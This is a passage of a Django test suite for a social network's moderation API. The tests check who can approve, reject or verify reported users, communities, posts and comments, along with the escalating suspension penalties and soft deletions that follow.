text=make_fake_post_comment_text())
# react to reply
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reply_reaction = community_post_comment_reply_reactor.react_to_post_comment(
post_comment=community_post_comment_reply,
emoji_id=emoji.pk)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reply_reaction).exists())
def test_approving_community_post_comment_moderated_object_deletes_user_mention_notifications(self):
"""
should delete user mention notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
mentioned_user = make_user(username='joelito')
post_comment_text = 'Hello @joelito'
community_post_comment_creator.join_community_with_name(community_name=community.name)
mentioned_user.join_community_with_name(community_name=community.name)
# create community post and comment with mention
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=post_comment_text)
# get user mention
PostCommentUserMention = get_post_comment_user_mention_model()
community_post_comment_user_mention = PostCommentUserMention.objects.get(post_comment=community_post_comment)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentUserMentionNotification = get_post_comment_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentUserMentionNotification.objects.filter(
post_comment_user_mention=community_post_comment_user_mention).exists())
def test_can_approve_community_post_comment_moderated_object_if_community_post_comment_moderator(self):
"""
should be able to approve a community_post_comment moderated object if community_post_comment moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_cant_approve_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to approve a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_creates_approved_changed_log_on_update(self):
"""
should create an approved changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectStatusChangedLog.objects.filter(
changed_from=ModeratedObject.STATUS_PENDING,
changed_to=ModeratedObject.STATUS_APPROVED,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('approve-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class RejectModeratedObjectApiTests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_reject_user_moderated_object_if_global_moderator(self):
"""
should be able to reject a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_user_moderated_object_if_community_moderator(self):
"""
should not be able to reject a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_reject_user_moderated_object_if_regular_user(self):
"""
should not be able to reject a user moderated object if regular user
"""
regular_user = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_moderated_object_if_global_moderator(self):
"""
should be able to reject a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_moderated_object_if_community_moderator(self):
"""
should not be able to reject a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_reject_community_moderated_object_if_regular_user(self):
"""
should not be able to reject a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_post_moderated_object_if_global_moderator(self):
"""
should be able to reject a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_can_reject_community_post_moderated_object_if_community_post_moderator(self):
"""
should be able to reject a community_post moderated object if community_post moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_post_moderated_object_if_regular_user(self):
"""
should not be able to reject a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to reject a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_can_reject_community_post_comment_moderated_object_if_community_moderator(self):
"""
should be able to reject a community_post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to reject a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_creates_rejected_changed_log_on_update(self):
"""
should create a rejected status changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectStatusChangedLog.objects.filter(
changed_from=ModeratedObject.STATUS_PENDING,
changed_to=ModeratedObject.STATUS_REJECTED,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('reject-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class VerifyModeratedObjectApiTests(OpenbookAPITestCase):
"""
VerifyModeratedObjectApi
"""
def test_verifying_approved_low_severity_moderated_object_places_exponential_minutes_suspension_penalty(
self):
"""
verifying an approved low severity moderated object should place an exponential minutes suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_LOW)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_LOW)
expected_expiration_date = (timezone.now() + timezone.timedelta(minutes=penalties_count ** 2))
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration = moderation_penalty.expiration
self.assertEqual(expected_expiration_date.date(), moderation_penalty_expiration.date())
self.assertEqual(expected_expiration_date.hour, moderation_penalty_expiration.hour)
self.assertEqual(expected_expiration_date.minute, moderation_penalty_expiration.minute)
def test_verifying_approved_medium_severity_moderated_object_places_exponential_hours_suspension_penalty(
self):
"""
verifying an approved medium severity moderated object should place an exponential hours suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_MEDIUM)
expected_expiration_date = timezone.now() + timezone.timedelta(hours=penalties_count ** 3)
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration = moderation_penalty.expiration
self.assertEqual(expected_expiration_date.date(), moderation_penalty_expiration.date())
self.assertEqual(expected_expiration_date.hour, moderation_penalty_expiration.hour)
self.assertEqual(expected_expiration_date.minute, moderation_penalty_expiration.minute)
def test_verifying_approved_high_severity_moderated_object_places_exponential_days_suspension_penalty(
self):
"""
verifying an approved high severity moderated object should place an exponential days suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_HIGH)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_HIGH)
expected_expiration_date = (timezone.now() + timezone.timedelta(days=penalties_count ** 4)).date()
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration_date = moderation_penalty.expiration.date()
self.assertEqual(expected_expiration_date, moderation_penalty_expiration_date)
def test_verifying_approved_critical_severity_moderated_object_places_5000_weeks_suspension_penalty(self):
"""
verifying an approved critical severity moderated object should place a 5000 weeks suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
expected_expiration_date = (timezone.now() + timezone.timedelta(weeks=5000)).date()
moderation_penalty = ModerationPenalty.objects.get(
user_id=user.pk, )
moderation_penalty_expiration_date = moderation_penalty.expiration.date()
self.assertEqual(expected_expiration_date, moderation_penalty_expiration_date)
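The four tests above verify an escalating suspension schedule by severity: minutes grow with the square of the user's penalty count, hours with the cube, days with the fourth power, and critical severity pins an effectively permanent 5000-week suspension. A minimal sketch of that schedule; the `suspension_delta` helper and the severity strings are illustrative stand-ins, not the API under test (the tests use `ModerationCategory.SEVERITY_*` constants and server-side logic):

```python
from datetime import timedelta

def suspension_delta(severity, penalties_count):
    """Return the suspension duration implied by the assertions above."""
    if severity == 'low':
        # minutes grow quadratically with the prior penalty count
        return timedelta(minutes=penalties_count ** 2)
    if severity == 'medium':
        # hours grow cubically
        return timedelta(hours=penalties_count ** 3)
    if severity == 'high':
        # days grow with the fourth power
        return timedelta(days=penalties_count ** 4)
    # critical severity: effectively permanent (~96 years)
    return timedelta(weeks=5000)
```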
def test_verifying_approved_any_severity_post_comment_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity post_comment moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
post_comment_creator = make_user()
post = post_comment_creator.create_public_post(text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post, text=make_fake_post_comment_text())
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_comment_for_post(post_comment=post_comment, post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(PostComment.objects.filter(
pk=post_comment.pk,
is_deleted=True,
).exists())
def test_verifying_approved_any_severity_community_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity community moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
community_creator = make_user()
community = make_community(creator=community_creator)
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(Community.objects.filter(
pk=community.pk,
is_deleted=True,
).exists())
def test_verifying_approved_any_severity_post_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity post moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(Post.objects.filter(
pk=post.pk,
is_deleted=True,
).exists())
def test_verifying_approved_critical_severity_user_moderated_object_soft_deletes_its_posts_comments_and_communities(self):
"""
verifying an approved critical severity user moderated object should soft delete its posts, comments and communities
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
post = user.create_public_post(text=make_fake_post_text())
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
community = make_community(creator=user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
community.refresh_from_db()
post_comment.refresh_from_db()
self.assertTrue(post.is_deleted)
self.assertTrue(community.is_deleted)
self.assertTrue(post_comment.is_deleted)
def test_verifying_rejected_critical_severity_user_moderated_object_does_not_soft_delete_its_posts_comments_and_communities(
self):
"""
verifying a rejected critical severity user moderated object should not soft delete its posts, comments and communities
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
post = user.create_public_post(text=make_fake_post_text())
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
community = make_community(creator=user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
community.refresh_from_db()
post_comment.refresh_from_db()
self.assertFalse(post.is_deleted)
self.assertFalse(community.is_deleted)
self.assertFalse(post_comment.is_deleted)
def test_verifying_approved_any_severity_post_moderated_object_soft_deletes_its_comments(self):
"""
verifying an approved any severity post moderated object should soft delete its comments
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
amount_of_post_comments = 5
post_comment_ids = []
for i in range(0, amount_of_post_comments):
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
post_comment_ids.append(post_comment.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(post_comment_ids), PostComment.objects.filter(
post_id=post.pk,
is_deleted=True,
).count())
def test_verifying_approved_any_severity_community_moderated_object_soft_deletes_its_posts(self):
"""
verifying an approved any severity community moderated object should soft delete its posts
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
community = make_community()
amount_of_posts = 5
post_ids = []
for i in range(0, amount_of_posts):
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
community_post = post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
post_ids.append(community_post.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(post_ids), Post.objects.filter(
community_id=community.pk,
is_deleted=True,
).count())
def test_verifying_approved_critical_severity_user_moderated_object_soft_deletes_it(self):
"""
verifying an approved critical severity user moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.filter(
pk=user.pk,
is_deleted=True,
).exists())
def test_verifying_approved_not_critical_severity_user_moderated_object_does_not_soft_delete_it(self):
"""
verifying an approved non-critical severity user moderated object should not soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_HIGH)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.filter(
pk=user.pk,
is_deleted=False,
).exists())
